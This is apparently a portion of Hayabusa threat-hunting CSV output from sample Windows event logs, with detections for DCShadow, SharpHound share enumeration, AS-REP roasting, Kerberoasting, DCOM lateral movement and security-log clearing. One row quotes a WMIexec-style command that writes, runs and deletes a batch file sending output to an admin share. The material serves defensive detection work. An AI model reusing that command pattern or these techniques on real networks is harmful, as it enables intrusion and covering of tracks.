+2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
+2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: C:\Windows\system32\cmd.exe  /Q /c C:\Windows\TEMP\execute.bat   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd  ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
+2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47450  :  LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 34544  :  LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 45246  :  LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob  :  LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob  :  Workstation:   :  IP Address: 192.168.1.2  :  Port: 54633  :  LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob  :  Workstation:   :  IP Address: 192.168.1.2  :  Port: 54635  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice  :  Service: krbtgt  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0  :  PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54374  :  LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: 192.168.1.100  :  Port: 54375  :  LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54376  :  LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54379  :  LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54388  :  LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54389  :  LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice  :  Workstation:   :  IP Address: 192.168.1.200  :  Port: 40316  :  LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice  :  Service: krbtgt  :  IP Address: ::ffff:192.168.1.200  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL  :  Service: sql101  :  IP Address: ::ffff:192.168.1.200  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice  :  LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
+2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
